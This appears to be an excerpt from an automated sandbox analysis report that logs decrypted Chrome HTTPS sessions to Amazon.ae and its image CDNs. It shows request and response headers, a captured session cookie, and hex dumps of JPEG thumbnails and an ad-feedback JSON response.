                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: 7FmfDdbcqEO6mUMbIXZQJheE7YNEQLxUgBpqedH_R2towvEVvScqOA==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC5020INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 02 02 02 03 02 03 03 03 03 04 06 05 05 04 05 05 08 06 04 06 05 07 05 05 05 07 05 07 07 05 06 07 06 06 08 07 06 06 07 08 06 07 08 0b 08 09 08 0a 08 08 0a 08 0b 08 0b 0b 0b 0b 0c 0d 0b 07 0c 11 01 03 03 02 03 03 03 04 03 03 06 0a 07 05 08 0b 09 04 08 0d 0b 0d 08 0b 0b 0b 0b 08 0e 0b 0d 0a 0b 06 0b 0b 08 0a 0a 08 08 09 08 09 0b 08 0b 0b 0b 05 08 0b 0a 07 0f 08 08 07 0b 0a 0c 0a 07 0b 0e ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 39 00 01 00 01 03 05 01 00 00 00 00 00 00 00 00 00 00 00 09 05 06 08 01 02 03 04 07 0a 01 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 04 05 03 06 01 02 07 08 09 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 96 41 bc 7c ee 1d 7b e2 dd
                                                                                                                                                                                                                                                                      Data Ascii: JFIFt"9A|{


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      139192.168.2.54986918.239.36.214432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1584OUTGET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_right-7_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22right-7%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DREz88vUB1bF630ZNVKUQFtQAAAGRdjK03wMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICD-zm4e%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1
                                                                                                                                                                                                                                                                      Host: www.amazon.ae
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011; csm-hit=tb:s-APAVCQJMFK78QJEV1PMZ|1724264920834&t:1724264922221&adb:adblk_no; session-token=iEWMYEFKrtJIow/CNVuOz9FUzjcviv4X0ndqos/Z/EndZGMUPIqV/cGu0xyhHpymMzemV8FzzfcoPADcJtxlyqX92z9iptXKr7Ms1mulHo/qBujYJmsju/RRcnb/s2XPz1nDckf2AVkM7phlRS6PK0A8Oyz8zrBSfywK4K42pHS6LfHMBPPWnR7dE/8YgkCddjRb8f8+hproby/VGgI8K8LnWJVX3JXL79eqf88m0ziYgOsvjw8MkYnWie0RnY4FwNp1tJATQeWJi10aPKwLq+9IR2ER+0budc5NnOCUOKiuDhl6E9x/w1jDuk96dSs86r5dxrWNLvn3N15ReTLbBABXtREiOpP9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1079INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:48 GMT
                                                                                                                                                                                                                                                                      Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                      x-amz-rid: T6Y3Y3WZJ9TPFQR8D63N
                                                                                                                                                                                                                                                                      content-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                                                                                      Accept-CH-Lifetime: 86400
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      Accept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-version
                                                                                                                                                                                                                                                                      X-XSS-Protection: 1;
                                                                                                                                                                                                                                                                      Content-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                      Via: 1.1 bb69678e2a9bd96a2b2aa070ba9687a4.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P2
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: WExWeNbqO09Cj1GF_MDXisDuE2mq5ESYJAWZ2pc3OopybQT3fbvz6g==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC4757INData Raw: 31 32 38 64 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 68 74 6d 6c 22 3a 22 3c 61 20 64 61 74 61 2d 61 2d 6d 6f 64 61 6c 3d 5c 22 7b 26 71 75 6f 74 3b 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 2f 61 66 2f 66 65 65 64 62 61 63 6b 2d 66 6f 72 6d 3f 70 6c 3d 25 37 42 25 32 32 61 64 50 6c 61 63 65 6d 65 6e 74 4d 65 74 61 44 61 74 61 25 32 32 25 33 41 25 37 42 25 32 32 61 64 45 6c 65 6d 65 6e 74 49 64 25 32 32 25 33 41 25 32 32 61 70 65 5f 47 61 74 65 77 61 79 5f 72 69 67 68 74 2d 37 5f 64 65 73 6b 74 6f 70 5f 70 6c 61 63 65 6d 65 6e 74 25 32 32 25 32 43 25 32 32 70 61 67 65 54 79 70 65 25 32 32 25 33 41 25 32 32 47 61 74 65 77 61 79 25 32 32 25 32 43 25 32 32 70 61 67 65 55 72 6c 25 32 32 25 33 41 25 32 32 61 48 52 30 63 48 4d 36 4c 79 39 33
                                                                                                                                                                                                                                                                      Data Ascii: 128d{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_right-7_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC20INData Raw: 66 0d 0a 75 6d 65 6e 74 2c 20 4d 61 74 68 29 3b 22 7d 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: fument, Math);"}
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      140192.168.2.54987618.239.85.2234432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC378OUTGET /images/I/31EO3Wv+aeL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC829INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 3718
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: df663bc6-d40c-4879-a7b0-683b91b8d4d0
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 17:13:03 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 31 Oct 2023 09:32:16 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-276,/images/I/31EO3Wv+aeL
                                                                                                                                                                                                                                                                      Expires: Tue, 16 Aug 2044 17:13:03 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-276 /images/I/31EO3Wv+aeL
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 c27d2e9d4c6e59d1b92ac8671f0bfb9c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: sIN21XrThNfNVfrwT-gjorqD579bAWij2mvgfmwcHNxjnMIC_ADVFg==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC3718INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 31 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 09 04 05 06 07 01 02 08 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f6 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"1X


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      141192.168.2.54986218.239.85.2234432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC378OUTGET /images/I/31b7GLJLg9L._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC830INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 6012
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 17c09b80-8db1-40fb-90cd-8b725dcc4fef
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:48 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 12 Sep 2023 23:26:32 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-959,/images/I/31b7GLJLg9L
                                                                                                                                                                                                                                                                      Expires: Tue, 16 Aug 2044 18:28:48 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-959 /images/I/31b7GLJLg9L
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 d1867b092f625a3679893299e10edaee.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: 4OamRkSnn_5jN5XBM3cClAMTDH_I0FQ6U_q-84WXvmHAoPPV3rs24w==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC6012INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 32 00 01 00 02 02 02 03 00 00 00 00 00 00 00 00 00 00 00 07 08 05 06 03 04 01 02 09 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b9 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"2`


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      142192.168.2.54987518.239.85.2234432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC378OUTGET /images/I/41CGjw1qziL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC842INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 4933
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 4a67421e-1e74-450f-8dde-744f63ebc049
                                                                                                                                                                                                                                                                      Date: Mon, 19 Aug 2024 01:16:12 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 07 May 2024 19:56:26 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-083,/images/I/41CGjw1qziL
                                                                                                                                                                                                                                                                      Expires: Sun, 14 Aug 2044 01:16:12 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-083 /images/I/41CGjw1qziL
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 a44309111e5e1050ff485adaa4681ad0.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 234756
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: Q4tuwx2nkq8Y2KqGGwrVVrNBQV_v_WDJvPLPna8olDpuh4dfzy4uXg==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC4933INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 33 00 01 00 00 07 01 01 00 00 00 00 00 00 00 00 00 00 00 03 04 05 06 07 08 09 02 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 02 01 03 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 dc b0 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"3


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      143192.168.2.54986118.239.85.2234432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC378OUTGET /images/I/31+hYY59fPL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC829INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 3914
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 1d8579d8-ad73-4e4b-86f5-e9661e08ebf9
                                                                                                                                                                                                                                                                      Date: Mon, 19 Aug 2024 10:51:15 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 12 Sep 2023 23:27:14 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-039,/images/I/31+hYY59fPL
                                                                                                                                                                                                                                                                      Expires: Sun, 14 Aug 2044 10:51:15 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-039 /images/I/31+hYY59fPL
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 0d3372129d548b57c62777e24b79e514.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: _AUOjhy9ekEPf30CH75036ByF4TYdKPg0Sm0b7LC2b6y-AaV4XrYrA==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC3914INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 32 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 06 04 05 07 09 01 02 03 08 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fb 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"2,


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      144192.168.2.549865151.101.193.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC456OUTGET /images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871139_186x116_1X_en_AE._SY116_CB569183660_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 5275
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: ab290550-ce6c-4166-b33b-358704e57eea
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 23 Jul 2024 07:16:18 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Expires: Sun, 24 Jul 2044 09:42:52 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 1822093
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:48 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kcgs7200097-IAD, cache-nyc-kteb1890069-NYC
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 14 0f 0f 0c 0f 0f 1a 13 0e 13 11 18 0f 11 11 18 11 18 18 11 15 18 15 15 1b 18 14 14 18 1b 15 18 19 25 19 1d 1a 20 1b 19 23 19 25 19 25 24 24 26 29 2a 25 18 29 38 01 09 09 05 09 09 09 0c 09 09 14 23 18 0f 1b 24 1d 0c 19 2b 24 2a 1b 24 26 24 24 1a 2f 24 2a 23 24 15 25 24 1b 20 20 1b 1b 1d 19 1d 24 1b 26 26 25 0f 1a 26 23 18 32 1a 1b 18 24 23 29 20 18 26 2d ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 ab 00 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 00 05 06 07 08 01 02 04 03 10 00 02 01 03 03 01 04 06 07 04 09 04 03 00 00 00 01 02 03 00 04 11 05 12 21 06 07 13 31 41 14 32 51 52 61 91 15 16 22 71 81 b2 d2 35 74 93 d1 23 24 34 42
                                                                                                                                                                                                                                                                      Data Ascii: JFIF% #%%$$&)*%)8#$+$*$&$$/$*#$%$ $&&%&#2$#) &-t"!1A2QRa"q5t#$4B
